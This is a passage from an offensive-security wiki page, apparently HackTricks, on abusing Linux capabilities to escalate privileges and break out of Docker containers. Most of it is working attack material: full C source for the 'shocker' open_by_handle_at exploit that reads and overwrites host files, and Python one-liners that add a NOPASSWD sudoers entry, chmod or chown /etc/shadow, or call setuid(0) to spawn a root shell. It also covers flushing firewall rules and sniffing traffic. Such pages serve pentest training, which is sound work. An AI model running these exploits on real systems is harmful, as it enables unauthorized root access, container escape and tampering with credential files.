memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}
int main(int argc,char* argv[] )
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, argv[1], &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
printf("Success!!\n");
FILE *fptr;
fptr = fopen(argv[2], "w");
fprintf(fptr,"%s", buf);
fclose(fptr);
close(fd2); close(fd1);
return 0;
}
{% hint style="warning" %} The exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command: {% endhint %}
The code of this technique was copied from the laboratory of "Abusing DAC_READ_SEARCH Capability" from https://www.pentesteracademy.com/
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
This mean that you can bypass write permission checks on any file, so you can write any file.
There are a lot of files you can overwrite to escalate privileges, you can get ideas from here.
Example with binary
In this example vim has this capability, so you can modify any file like passwd, sudoers or shadow:
getcap -r / 2>/dev/null
/usr/bin/vim = cap_dac_override+ep
vim /etc/sudoers #To overwrite it
Example with binary 2
In this example python
binary will have this capability. You could use python to override any file:
file=open("/etc/sudoers","a")
file.write("yourusername ALL=(ALL) NOPASSWD:ALL")
file.close()
Example with environment + CAP_DAC_READ_SEARCH (Docker breakout)
You can check the enabled capabilities inside the docker container using:
capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=0(root)
First of all read the previous section that abuses DAC_READ_SEARCH capability to read arbitrary files of the host and compile the exploit.
Then, compile the following version of the shocker exploit that will allow you to write arbitrary files inside the hosts filesystem:
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dirent.h>
#include <stdint.h>
// gcc shocker_write.c -o shocker_write
// ./shocker_write /etc/passwd passwd
struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};
void die(const char * msg) {
perror(msg);
exit(errno);
}
void dump_handle(const struct my_file_handle * h) {
fprintf(stderr, "[*] #=%d, %d, char nh[] = {", h -> handle_bytes,
h -> handle_type);
for (int i = 0; i < h -> handle_bytes; ++i) {
fprintf(stderr, "0x%02x", h -> f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr, "\n");
if (i < h -> handle_bytes - 1)
fprintf(stderr, ", ");
}
fprintf(stderr, "};\n");
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR * dir = NULL;
struct dirent * de = NULL;
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh -> f_handle, ih -> f_handle, sizeof(oh -> f_handle));
oh -> handle_type = 1;
oh -> handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle * ) ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de -> d_name);
if (strncmp(de -> d_name, path, strlen(de -> d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de -> d_name, (int) de -> d_ino);
ino = de -> d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, & ino, sizeof(ino));
memcpy(outh.f_handle + 4, & i, sizeof(i));
if ((i % (1 << 20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de -> d_name, i);
if (open_by_handle_at(bfd, (struct file_handle * ) & outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle( & outh);
return find_handle(bfd, path, & outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
}
int main(int argc, char * argv[]) {
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {
0x02,
0,
0,
0,
0,
0,
0,
0
}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, argv[1], & root_h, & h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle( & h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle * ) & h, O_RDWR)) < 0)
die("[-] open_by_handle");
char * line = NULL;
size_t len = 0;
FILE * fptr;
ssize_t read;
fptr = fopen(argv[2], "r");
while ((read = getline( & line, & len, fptr)) != -1) {
write(fd2, line, read);
}
printf("Success!!\n");
close(fd2);
close(fd1);
return 0;
}
In order to scape the docker container you could download the files /etc/shadow
and /etc/passwd
from the host, add to them a new user, and use shocker_write
to overwrite them. Then, access via ssh.
The code of this technique was copied from the laboratory of "Abusing DAC_OVERRIDE Capability" from https://www.pentesteracademy.com
This means that it's possible to change the ownership of any file.
Example with binary
Lets suppose the python
binary has this capability, you can change the owner of the shadow file, change root password, and escalate privileges:
python -c 'import os;os.chown("/etc/shadow",1000,1000)'
Or with the ruby
binary having this capability:
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
This means that it's possible to change the permission of any file.
Example with binary
If python has this capability you can modify the permissions of the shadow file, change root password, and escalate privileges:
python -c 'import os;os.chmod("/etc/shadow",0666)
This means that it's possible to set the effective user id of the created process.
Example with binary
If python has this capability, you can very easily abuse it to escalate privileges to root:
import os
os.setuid(0)
os.system("/bin/bash")
Another way:
import os
import prctl
#add the capability to the effective set
prctl.cap_effective.setuid = True
os.setuid(0)
os.system("/bin/bash")
This means that it's possible to set the effective group id of the created process.
There are a lot of files you can overwrite to escalate privileges, you can get ideas from here.
Example with binary
In this case you should look for interesting files that a group can read because you can impersonate any group:
#Find every file writable by a group
find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file writable by a group in /etc with a maxpath of 1
find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file readable by a group in /etc with a maxpath of 1
find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null
Once you have find a file you can abuse (via reading or writing) to escalate privileges you can get a shell impersonating the interesting group with:
import os
os.setgid(42)
os.system("/bin/bash")
In this case the group shadow was impersonated so you can read the file /etc/shadow
:
cat /etc/shadow
If docker is installed you could impersonate the docker group and abuse it to communicate with the docker socket and escalate privileges.
This means that it's possible to set capabilities on files and processes
Example with binary
If python has this capability, you can very easily abuse it to escalate privileges to root:
{% code title="setcapability.py" %}
import ctypes, sys
#Load needed library
#You can find which library you need to load checking the libraries of local setcap binary
# ldd /sbin/setcap
libcap = ctypes.cdll.LoadLibrary("libcap.so.2")
libcap.cap_from_text.argtypes = [ctypes.c_char_p]
libcap.cap_from_text.restype = ctypes.c_void_p
libcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p]
#Give setuid cap to the binary
cap = 'cap_setuid+ep'
path = sys.argv[1]
print(path)
cap_t = libcap.cap_from_text(cap)
status = libcap.cap_set_file(path,cap_t)
if(status == 0):
print (cap + " was successfully added to " + path)
{% endcode %}
python setcapability.py /usr/bin/python2.7
{% hint style="warning" %} Note that if you set a new capability to the binary with CAP_SETFCAP, you will lose this cap. {% endhint %}
Once you have SETUID capability you can go to its section to see how to escalate privileges.
Example with environment (Docker breakout)
By default the capability CAP_SETFCAP is given to the proccess inside the container in Docker. You can check that doing something like:
cat /proc/`pidof bash`/status | grep Cap
CapInh: 00000000a80425fb
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
This capability allow to give any other capability to binaries, so we could think about escaping from the container abusing any of the other capability breakouts mentioned in this page.
However, if you try to give for example the capabilities CAP_SYS_ADMIN and CAP_SYS_PTRACE to the gdb binary, you will find that you can give them, but the binary won’t be able to execute after this:
getcap /usr/bin/gdb
/usr/bin/gdb = cap_sys_ptrace,cap_sys_admin+eip
setcap cap_sys_admin,cap_sys_ptrace+eip /usr/bin/gdb
/usr/bin/gdb
bash: /usr/bin/gdb: Operation not permitted
From the docs: Permitted: This is a limiting superset for the effective capabilities that the thread may assume. It is also a limiting superset for the capabilities that may be added to the inheri‐table set by a thread that does not have the CAP_SETPCAP capability in its effective set.
It looks like the Permitted capabilities limit the ones that can be used.
However, Docker also grants the CAP_SETPCAP by default, so you might be able to set new capabilities inside the inheritables ones.
However, in the documentation of this cap: CAP_SETPCAP : […] add any capability from the calling thread’s bounding set to its inheritable set.
It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that we cannot put new capabilities like CAP_SYS_ADMIN or CAP_SYS_PTRACE in the inherit set to escalate privileges.
CAP_SYS_RAWIO provides a number of sensitive operations including access to /dev/mem
, /dev/kmem
or /proc/kcore
, modify mmap_min_addr
, access ioperm(2)
and iopl(2)
system calls, and various disk commands. The FIBMAP ioctl(2)
is also enabled via this capability, which has caused issues in the past. As per the man page, this also allows the holder to descriptively perform a range of device-specific operations on other devices
.
This can be useful for privilege escalation and Docker breakout.
This means that it's possible to kill any process.
Example with binary
Lets suppose the python
binary has this capability. If you could also modify some service or socket configuration (or any configuration file related to a service) file, you could backdoor it, and then kill the process related to that service and wait for the new configuration file to be executed with your backdoor.
#Use this python code to kill arbitrary processes
import os
import signal
pgid = os.getpgid(341)
os.killpg(pgid, signal.SIGKILL)
Privesc with kill
If you have kill capabilities and there is a node program running as root (or as a different user)you could probably send it the signal SIGUSR1 and make it open the node debugger to where you can connect.
kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
{% content-ref url="electron-cef-chromium-debugger-abuse.md" %} electron-cef-chromium-debugger-abuse.md {% endcontent-ref %}
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
This means that it's possible to listen in any port (even in privileged ones). You cannot escalate privileges directly with this capability.
Example with binary
If python
has this capability it will be able to listen on any port and even connect from it to any other port (some services require connections from specific privileges ports)
{% tabs %} {% tab title="Listen" %}
import socket
s=socket.socket()
s.bind(('0.0.0.0', 80))
s.listen(1)
conn, addr = s.accept()
while True:
output = connection.recv(1024).strip();
print(output)
{% endtab %}
{% tab title="Connect" %}
import socket
s=socket.socket()
s.bind(('0.0.0.0',500))
s.connect(('10.10.10.10',500))
{% endtab %} {% endtabs %}
CAP_NET_RAW capability permits processes to create RAW and PACKET sockets, enabling them to generate and send arbitrary network packets. This can lead to security risks in containerized environments, such as packet spoofing, traffic injection, and bypassing network access controls. Malicious actors could exploit this to interfere with container routing or compromise host network security, especially without adequate firewall protections. Additionally, CAP_NET_RAW is crucial for privileged containers to support operations like ping via RAW ICMP requests.
This means that it's possible to sniff traffic. You cannot escalate privileges directly with this capability.
Example with binary
If the binary tcpdump
has this capability you will be able to use it to capture network information.
getcap -r / 2>/dev/null
/usr/sbin/tcpdump = cap_net_raw+ep
Note that if the environment is giving this capability you could also use tcpdump
to sniff traffic.
Example with binary 2
The following example is python2
code that can be useful to intercept traffic of the "lo" (localhost) interface. The code is from the lab "The Basics: CAP-NET_BIND + NET_RAW" from https://attackdefense.pentesteracademy.com/
import socket
import struct
flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"]
def getFlag(flag_value):
flag=""
for i in xrange(8,-1,-1):
if( flag_value & 1 <<i ):
flag= flag + flags[8-i] + ","
return flag[:-1]
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30)
s.bind(("lo",0x0003))
flag=""
count=0
while True:
frame=s.recv(4096)
ip_header=struct.unpack("!BBHHHBBH4s4s",frame[14:34])
proto=ip_header[6]
ip_header_size = (ip_header[0] & 0b1111) * 4
if(proto==6):
protocol="TCP"
tcp_header_packed = frame[ 14 + ip_header_size : 34 + ip_header_size]
tcp_header = struct.unpack("!HHLLHHHH", tcp_header_packed)
dst_port=tcp_header[0]
src_port=tcp_header[1]
flag=" FLAGS: "+getFlag(tcp_header[4])
elif(proto==17):
protocol="UDP"
udp_header_packed_ports = frame[ 14 + ip_header_size : 18 + ip_header_size]
udp_header_ports=struct.unpack("!HH",udp_header_packed_ports)
dst_port=udp_header[0]
src_port=udp_header[1]
if (proto == 17 or proto == 6):
print("Packet: " + str(count) + " Protocol: " + protocol + " Destination Port: " + str(dst_port) + " Source Port: " + str(src_port) + flag)
count=count+1
CAP_NET_ADMIN capability grants the holder the power to alter network configurations, including firewall settings, routing tables, socket permissions, and network interface settings within the exposed network namespaces. It also enables turning on promiscuous mode on network interfaces, allowing for packet sniffing across namespaces.
Example with binary
Lets suppose that the python binary has these capabilities.
#Dump iptables filter table rules
import iptc
import pprint
json=iptc.easy.dump_table('filter',ipv6=False)
pprint.pprint(json)
#Flush iptables filter table
import iptc
iptc.easy.flush_table('filter')
This means that it's possible modify inode attributes. You cannot escalate privileges directly with this capability.
Example with binary
If you find that a file is immutable and python has this capability, you can remove the immutable attribute and make the file modifiable:
#Check that the file is imutable
lsattr file.sh
----i---------e--- backup.sh
#Pyhton code to allow modifications to the file
import fcntl
import os
import struct
FS_APPEND_FL = 0x00000020
FS_IOC_SETFLAGS = 0x40086602
fd = os.open('/path/to/file.sh', os.O_RDONLY)
f = struct.pack('i', FS_APPEND_FL)
fcntl.ioctl(fd, FS_IOC_SETFLAGS, f)
f=open("/path/to/file.sh",'a+')
f.write('New content for the file\n')
{% hint style="info" %} Note that usually this immutable attribute is set and remove using:
sudo chattr +i file.txt
sudo chattr -i file.txt
{% endhint %}
CAP_SYS_CHROOT enables the execution of the chroot(2)
system call, which can potentially allow for the escape from chroot(2)
environments through known vulnerabilities:
CAP_SYS_BOOT not only allows the execution of the reboot(2)
system call for system restarts, including specific commands like LINUX_REBOOT_CMD_RESTART2
tailored for certain hardware platforms, but it also enables the use of kexec_load(2)
and, from Linux 3.17 onwards, kexec_file_load(2)
for loading new or signed crash kernels respectively.
CAP_SYSLOG was separated from the broader CAP_SYS_ADMIN in Linux 2.6.37, specifically granting the ability to use the syslog(2)
call. This capability enables the viewing of kernel addresses via /proc
and similar interfaces when the kptr_restrict
setting is at 1, which controls the exposure of kernel addresses. Since Linux 2.6.39, the default for kptr_restrict
is 0, meaning kernel addresses are exposed, though many distributions set this to 1 (hide addresses except from uid 0) or 2 (always hide addresses) for security reasons.
Additionally, CAP_SYSLOG allows accessing dmesg
output when dmesg_restrict
is set to 1. Despite these changes, CAP_SYS_ADMIN retains the ability to perform syslog
operations due to historical precedents.
CAP_MKNOD extends the functionality of the mknod
system call beyond creating regular files, FIFOs (named pipes), or UNIX domain sockets. It specifically allows for the creation of special files, which include:
- S_IFCHR: Character special files, which are devices like terminals.
- S_IFBLK: Block special files, which are devices like disks.
This capability is essential for processes that require the ability to create device files, facilitating direct hardware interaction through character or block devices.
It is a default docker capability (https://github.com/moby/moby/blob/master/oci/caps/defaults.go#L6-L19).
This capability permits to do privilege escalations (through full disk read) on the host, under these conditions:
- Have initial access to the host (Unprivileged).
- Have initial access to the container (Privileged (EUID 0), and effective
CAP_MKNOD
). - Host and container should share the same user namespace.
Steps to Create and Access a Block Device in a Container:
-
On the Host as a Standard User:
- Determine your current user ID with
id
, e.g.,uid=1000(standarduser)
. - Identify the target device, for example,
/dev/sdb
.
- Determine your current user ID with
-
Inside the Container as
root
:
# Create a block special file for the host device
mknod /dev/sdb b 8 16
# Set read and write permissions for the user and group
chmod 660 /dev/sdb
# Add the corresponding standard user present on the host
useradd -u 1000 standarduser
# Switch to the newly created user
su standarduser
- Back on the Host:
# Locate the PID of the container process owned by "standarduser"
# This is an illustrative example; actual command might vary
ps aux | grep -i container_name | grep -i standarduser
# Assuming the found PID is 12345
# Access the container's filesystem and the special block device
head /proc/12345/root/dev/sdb
This approach allows the standard user to access and potentially read data from /dev/sdb
through the container, exploiting shared user namespaces and permissions set on the device.
CAP_SETPCAP enables a process to alter the capability sets of another process, allowing for the addition or removal of capabilities from the effective, inheritable, and permitted sets. However, a process can only modify capabilities that it possesses in its own permitted set, ensuring it cannot elevate another process's privileges beyond its own. Recent kernel updates have tightened these rules, restricting CAP_SETPCAP
to only diminish the capabilities within its own or its descendants' permitted sets, aiming to mitigate security risks. Usage requires having CAP_SETPCAP
in the effective set and the target capabilities in the permitted set, utilizing capset()
for modifications. This summarizes the core function and limitations of CAP_SETPCAP
, highlighting its role in privilege management and security enhancement.
CAP_SETPCAP
is a Linux capability that allows a process to modify the capability sets of another process. It grants the ability to add or remove capabilities from the effective, inheritable, and permitted capability sets of other processes. However, there are certain restrictions on how this capability can be used.
A process with CAP_SETPCAP
can only grant or remove capabilities that are in its own permitted capability set. In other words, a process cannot grant a capability to another process if it does not have that capability itself. This restriction prevents a process from elevating the privileges of another process beyond its own level of privilege.
Moreover, in recent kernel versions, the CAP_SETPCAP
capability has been further restricted. It no longer allows a process to arbitrarily modify the capability sets of other processes. Instead, it only allows a process to lower the capabilities in its own permitted capability set or the permitted capability set of its descendants. This change was introduced to reduce potential security risks associated with the capability.
To use CAP_SETPCAP
effectively, you need to have the capability in your effective capability set and the target capabilities in your permitted capability set. You can then use the capset()
system call to modify the capability sets of other processes.
In summary, CAP_SETPCAP
allows a process to modify the capability sets of other processes, but it cannot grant capabilities that it doesn't have itself. Additionally, due to security concerns, its functionality has been limited in recent kernel versions to only allow reducing capabilities in its own permitted capability set or the permitted capability sets of its descendants.
Most of these examples were taken from some labs of https://attackdefense.pentesteracademy.com/, so if you want to practice this privesc techniques I recommend these labs.
Other references:
- https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
- https://www.schutzwerk.com/en/43/posts/linux_container_capabilities/#:~:text=Inherited%20capabilities%3A%20A%20process%20can,a%20binary%2C%20e.g.%20using%20setcap%20.
- https://linux-audit.com/linux-capabilities-101/
- https://www.linuxjournal.com/article/5737
- https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap_sys_module
- https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.